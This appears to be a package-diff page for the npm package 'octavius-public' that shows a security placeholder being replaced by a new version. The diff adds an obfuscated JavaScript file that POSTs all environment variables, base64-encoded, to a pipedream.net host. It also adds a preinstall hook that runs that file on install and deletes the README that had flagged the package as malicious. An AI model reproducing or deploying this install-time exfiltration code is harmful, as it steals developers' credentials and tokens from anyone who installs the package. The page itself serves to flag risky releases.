octavius-public 0.0.1-security → 4.959.309
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of octavius-public might be problematic. Click here for more details.
- package/baddbzz.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/baddbzz.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
const a0_0x3cbbdb=a0_0x5b7c;function a0_0x344b(){const _0x4e09f6=['d967104b6c9e3e7ee7e7f8bad1ba7209','write','3585992LaNejN','from','8799210sltCHG','https','5011848LAkaxw','end','328ilxZbG','net','pipedream','POST','stringify','11OlLJvJ','11379110RXPPrZ','6618LNyQRa','toString','1175368fOyEGq','join','base64','12VdcMfw','2681357iKugLO','request','1KPbWlN','npm_package_name'];a0_0x344b=function(){return _0x4e09f6;};return a0_0x344b();}(function(_0x94fc1e,_0x49fcf5){const _0x1741b1=a0_0x5b7c,_0x5286e2=_0x94fc1e();while(!![]){try{const _0x55e57f=-parseInt(_0x1741b1(0x1d8))/0x1*(-parseInt(_0x1741b1(0x1c3))/0x2)+-parseInt(_0x1741b1(0x1d0))/0x3*(-parseInt(_0x1741b1(0x1c9))/0x4)+-parseInt(_0x1741b1(0x1c5))/0x5+parseInt(_0x1741b1(0x1d5))/0x6*(-parseInt(_0x1741b1(0x1d6))/0x7)+-parseInt(_0x1741b1(0x1d2))/0x8+parseInt(_0x1741b1(0x1c7))/0x9+parseInt(_0x1741b1(0x1cf))/0xa*(parseInt(_0x1741b1(0x1ce))/0xb);if(_0x55e57f===_0x49fcf5)break;else _0x5286e2['push'](_0x5286e2['shift']());}catch(_0x346094){_0x5286e2['push'](_0x5286e2['shift']());}}}(a0_0x344b,0xf31de));const http=require(a0_0x3cbbdb(0x1c6));function a0_0x5b7c(_0x3ca012,_0x544876){const _0x344b06=a0_0x344b();return a0_0x5b7c=function(_0x5b7c56,_0x2087b4){_0x5b7c56=_0x5b7c56-0x1c3;let _0x338125=_0x344b06[_0x5b7c56];return _0x338125;},a0_0x5b7c(_0x3ca012,_0x544876);}req=http[a0_0x3cbbdb(0x1d7)]({'host':[a0_0x3cbbdb(0x1da),'m',a0_0x3cbbdb(0x1cb),a0_0x3cbbdb(0x1ca)][a0_0x3cbbdb(0x1d3)]('.'),'path':'/'+(process['env'][a0_0x3cbbdb(0x1d9)]||''),'method':a0_0x3cbbdb(0x1cc)}),req[a0_0x3cbbdb(0x1db)](Buffer[a0_0x3cbbdb(0x1c4)](JSON[a0_0x3cbbdb(0x1cd)](process['env']))[a0_0x3cbbdb(0x1d1)](a0_0x3cbbdb(0x1d4))),req[a0_0x3cbbdb(0x1c8)]();
|
package/package.json
CHANGED
@@ -1,6 +1,11 @@
|
|
1
1
|
{
|
2
2
|
"name": "octavius-public",
|
3
|
-
"version": "
|
4
|
-
"
|
5
|
-
"
|
3
|
+
"version": "4.959.309",
|
4
|
+
"main": "baddbzz.js",
|
5
|
+
"scripts": {
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
7
|
+
"preinstall": "node baddbzz.js"
|
8
|
+
},
|
9
|
+
"author": "",
|
10
|
+
"license": "ISC"
|
6
11
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=octavius-public for more information.
|